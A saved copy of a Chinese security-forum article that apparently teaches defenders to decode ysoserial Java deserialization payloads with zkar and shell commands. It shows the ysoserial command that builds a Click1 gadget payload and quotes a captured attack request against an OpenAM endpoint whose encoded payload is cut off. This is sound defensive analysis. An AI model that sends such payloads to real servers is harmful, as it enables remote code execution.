mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-11-06 19:24:02 +00:00
539 lines
2.7 MiB
HTML
539 lines
2.7 MiB
HTML
|
|
<!DOCTYPE html> <html><!--
|
|||
|
|
Page saved with SingleFile
|
|||
|
|
url: https://forum.butian.net/share/2785
|
|||
|
|
--><meta charset=utf-8>
|
|||
|
|
<meta http-equiv=X-UA-Compatible content="IE=edge">
|
|||
|
|
<meta name=viewport content="width=device-width, initial-scale=1">
|
|||
|
|
<meta name=csrf-token content=VD0owLiLrat8LaN2vBAqJtnLFngrtZgXtzYM7DqG>
|
|||
|
|
<title>一种 ysoserial.jar 反序列化Payload的解码</title>
|
|||
|
|
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
|
|||
|
|
<meta name=description content="奇安信攻防社区-一种 ysoserial.jar 反序列化Payload的解码">
|
|||
|
|
<meta name=author content="QIANXIN Team">
|
|||
|
|
<meta name=copyright content="2021 QIANXIN.com">
|
|||
|
|
<style>@media(max-width:767px){}</style>
|
|||
|
|
<style>/*!
|
|||
|
|
* Bootstrap v3.4.1 (https://getbootstrap.com/)
|
|||
|
|
* Copyright 2011-2019 Twitter, Inc.
|
|||
|
|
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
|
|||
|
|
*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}a:active,a:hover{outline:0}img{border:0}textarea{color:inherit;font:inherit;margin:0}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{-webkit-tap-highlight-color:rgba(0,0,0,0)}a:focus,a:hover{color:#23527c;text-decoration:underline}a:focus{outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}h2,h3{font-family:inherit;font-weight:500;line-height:1.1;color:inherit}h3{margin-top:20px;margin-bottom:10px}h3{font-size:24px}p{margin:0 0 10px}@media(min-width:768px){}ul{margin-top:0;margin-bottom:10px}@media(min-width:768px){}code{color:#c7254e}pre{display:block;margin:0 0 10px;color:#333;word-break:break-all;border:1px solid #ccc}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media(min-width:768px){.container{width:750px}}@media(min-width:992px){.container{width:970px}}@media(min-width:1200px){.container{width:1170px}}.row{margin-right:-15px;margin-left:-15px}.col-xs-12{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-12{float:left}.col-xs-12{width:100%}@media(min-width:768px){}@media(min-width:992px){.col-md-9{float:left}}@media(min-width:1200px){}@media screen and (max-width:767px){}@media screen and (-webkit-min-device-pixel-ratio:0){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-device-width:480px) and (orientation:landscape){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}@media screen and (min-width:768px){}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@media(min-width:768px){}@media(min-width:992px){}@media all and (transform-3d),(-webkit-transform-3d){}@media screen and (min-width:768px){}.btn-group-vertical>.btn-group:after,.btn-group-vertical>.btn-group:before,.btn-toolbar:after,.btn-toolbar:before,.clearfix:after,.clearfix:before,.container-fluid:after,.container-fluid:before,.container:after,.container:before,.dl-horizontal dd:after,.dl-horizontal dd:before,.form-horizontal .form-group:after,.form-horizontal .form-group:before,.modal-footer:after,.modal-footer:before,.modal-header:after,.modal-header:before,.nav:after,.nav:before,.navbar-collapse:after,.navbar-collapse:before,.navbar-header:after,.navbar-header:before,.navbar:after,.navbar:before,.pager:after,.pager:before,.panel-body:after,.panel-body:before,.row:after,.row:before{display:table;content:" "}.btn-group-vertical>.btn-group:after,.btn-toolbar:after,.clearfix:after,.container-fluid:after,.container:after,.dl-horizontal dd:after,.form-horizontal .form-group:after,.modal-footer:after,.modal-header:after,.nav:after,.navbar-collapse:after,.navbar-header:after,.navbar:after,.pager:after,.panel-body:after,.row:after{clear:both}@-ms-viewport{width:device-width}@media(max-width:767px){}@media(max-width:767px){}@media(max-width:767px){}@media(max-width:767px){}@media(min-width:768px) and (max-width:991px){}@media(min-width:768px) and (max-width:991px){}@media(m
|
|||
|
|
<style>/*!
|
|||
|
|
* Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
|
|||
|
|
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
|
|||
|
|
*/@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}</style>
|
|||
|
|
<style>@media(min-width:1200px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}pre{white-space:pre-wrap}@media(min-width:768px){}@media(min-width:992px){}@media(min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}textarea{font-family:inherit;font-size:inherit;line-height:inherit}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mt-10{margin-top:10px}.taglist-inline{list-style:none;padding:0;font-size:0}.taglist-inline li{padding:0;font-size:13px}.taglist-inline>li{display:inline-block;margin-right:5px}.taglist-inline>li:last-child{margin-right:0}.widget-article .quote{padding:25px;background:#f3f5f9;line-height:24px;overflow:hidden}@media(min-width:768px){}.word-wrap{word-wrap:break-word;word-break:normal}::-webkit-scrollbar{width:6px;height:6px}::-webkit-scrollbar-thumb{background-color:#e4e6eb;outline:0;border-radius:2px}::-webkit-scrollbar-track{box-shadow:none;border-radius:2px}</style>
|
|||
|
|
<style>a{text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}@media(max-width:767px){}@media(max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#e7f2ed;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}</style>
|
|||
|
|
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment,.hljs-variable{color:green}.hljs-built_in,.hljs-keyword{color:#00f}.hljs-string{color:#a31515}.hljs-meta{color:#2b91af}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#ffebe9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#fff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body h2{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0 !important}.markdown-body>*:last-child{margin-bottom:0 !important}.markdown-body a:not([href]){color:inherit;text-decoration:none}.markdown-body p,.markdown-body pre{margin-top:0;margin-bottom
|
|||
|
|
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<script src="/static/js/html5shiv.min.js"></script>
|
|||
|
|
<script src="/static/js/respond.min.js"></script>
|
|||
|
|
<![endif]-->
|
|||
|
|
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
|
|||
|
|
* Waves v0.7.5
|
|||
|
|
* http://fian.my.id/Waves
|
|||
|
|
*
|
|||
|
|
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
|
|||
|
|
* Released under the MIT license
|
|||
|
|
* https://github.com/fians/Waves/blob/master/LICENSE
|
|||
|
|
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
|
|||
|
|
<body>
|
|||
|
|
<div class="global-nav mb-50" style="display:none !important">
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="top-alert mt-60 clearfix text-center" style="display:none !important">
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
|
|||
|
|
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
|
|||
|
|
</div>
|
|||
|
|
<![endif]-->
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class=wrap>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class="row mt-10">
|
|||
|
|
<div class="col-xs-12 col-md-9 main">
|
|||
|
|
<div class=widget-article>
|
|||
|
|
<h3 class="title word-wrap">一种 ysoserial.jar 反序列化Payload的解码</h3>
|
|||
|
|
<ul class=taglist-inline>
|
|||
|
|
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
|
|||
|
|
</ul>
|
|||
|
|
<div class="content mt-10">
|
|||
|
|
<div class="quote mb-20">
|
|||
|
|
ysoserial大家平时多用于生成Payload,但是作为蓝队,我们更多的是想法子去解码Payload!
|
|||
|
|
</div>
|
|||
|
|
<textarea id=md_view_content style=display:none>0x00 前言
|
|||
|
|
-------
|
|||
|
|
|
|||
|
|
小伙伴在分析告警的时候,发现反序列化告警,Payload类似`AKztAA`,不知道咋解,于是有了本文。
|
|||
|
|
|
|||
|
|
0x01 文件头
|
|||
|
|
--------
|
|||
|
|
|
|||
|
|
开始之前,先来复习一些涉及到的一些文件头
|
|||
|
|
|
|||
|
|
以`rO0AB`开头,java序列化base64编码的数据
|
|||
|
|
以`aced`开头,java序列化的16进制
|
|||
|
|
以上两个,都可以用 <https://github.com/phith0n/zkar> 和https://github.com/NickstaDB/SerializationDumper 去解析
|
|||
|
|
|
|||
|
|
以`cafebabe`开头,java class文件的16进制,保存成class,拖到idea中反编译
|
|||
|
|
|
|||
|
|
有了这些文件头信息,下面就可以开始用ysoserial.jar生成Payload了
|
|||
|
|
|
|||
|
|
0x02 原始payload
|
|||
|
|
--------------
|
|||
|
|
|
|||
|
|
生成Payload
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
java -jar ysoserial.jar Click1 "touch /tmp/xx" > raw_payload.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
查看生成的Payload的十六进制
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
hexdump -C raw_payload.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
显然,以`aced`开头,java序列化的16进制,使用`zkar解析`
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
./zkar dump -f raw_payload.bin > raw_payload_decode.txt
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后查看生成的文件,应该可以找到下图:
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
以`cafebabe`开头,java class文件的16进制,保存成class,拖到idea中反编译即可。
|
|||
|
|
|
|||
|
|
0x03 编码替换的Payload
|
|||
|
|
-----------------
|
|||
|
|
|
|||
|
|
我们在日常分析的时候,java反序列化的漏洞,可能看到的是下面的`AKztAAV`开头的Payload,对于这类Payload的解码流程,基本上就是先补等号,替换`_`和`-`为`/`和`+`,然后base64解码,跳过开头的空字符,最后的结果丢给zkar解析就行。如果zkar解析出来有看到`ca fe`开头的十六进制,就把它提取出来,保存成class文件,最后将class文件丢给idea反编译,即可看到攻击者最终想要执行的命令了。有点乱?没关系,下面我们会一步步分析。
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
这种Payload 一般执行如下命令:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
java -jar ysoserial.jar Click1 "touch /tmp/xx" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
命令的意思是,使用`ysoserial.jar`生成一个指定`Click1`这个gadget 去执行`touch /tmp/xx`命令的序列化的Payload,然后在该Payload的前面插入一个空字节(`\x00`),之后对其进行base64编码,编码后的内容,将`/` 替换为 `_`,和 `+` 替换为 `-`,最后将`=`去掉。
|
|||
|
|
|
|||
|
|
&gt; 替换`/`和`+`是因为 base64 编码的输出可能包含 `/` 和 `+` 字符,这些字符在 URL 中有特殊含义,因此需要替换成其他字符以避免问题。
|
|||
|
|
|
|||
|
|
拆开如下:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
java -jar ysoserial.jar Click1 "touch /tmp/xx" > raw_payload.bin
|
|||
|
|
cat raw_payload.bin | (echo -ne \\x00 && cat) > raw_payload_00.bin
|
|||
|
|
cat raw_payload_00.bin | base64 > raw_payload_00_base64.bin
|
|||
|
|
cat raw_payload_00_base64.bin | tr '/+' '_-' | tr -d '=' > raw_payload_00_base64_replace.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
因此,我们反着来,即可一步步还原,先处理第四步,替换和等号的问题,等号需要根据字符串长度补充
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat raw_payload_00_base64_replace.bin | tr '_-' '/+' > restore_raw_payload_00_base64_replace_lack_equal.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后执行下面的shell脚本
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
#!/bin/bash
|
|||
|
|
|
|||
|
|
file_content=$(cat restore_raw_payload_00_base64_replace_lack_equal.bin)
|
|||
|
|
|
|||
|
|
# 移除可能存在的换行符
|
|||
|
|
base64_string=$(echo -n "$file_content" | tr -d '\n')
|
|||
|
|
|
|||
|
|
# 计算base64编码字符串长度
|
|||
|
|
length=${#base64_string}
|
|||
|
|
|
|||
|
|
# 计算需要补充的等号数量
|
|||
|
|
remainder=$((length % 4))
|
|||
|
|
padding=$(((4 - remainder) % 4))
|
|||
|
|
|
|||
|
|
# 补充等号
|
|||
|
|
if ((padding &gt; 0)); then
|
|||
|
|
padding_string=$(printf '=%.0s' $(seq 1 $padding))
|
|||
|
|
base64_string="$base64_string$padding_string"
|
|||
|
|
fi
|
|||
|
|
|
|||
|
|
echo "$base64_string"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
./add_equal.sh > restore_raw_payload_00_base64_replace.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
这时候我们可以比对一下,看看是否还原成功
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
接下来开始还原第三步,base64解码即可:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat restore_raw_payload_00_base64_replace.bin | base64 -d > restore_raw_payload_00.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
然后是第二步,跳过开头的空字节:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
tail -c +2 restore_raw_payload_00.bin > restore_raw_payload.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
最后就是拿过去让`zkar`解析了,这里不再重复了
|
|||
|
|
|
|||
|
|
0x04 实战
|
|||
|
|
-------
|
|||
|
|
|
|||
|
|
拿到攻击者的请求:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAA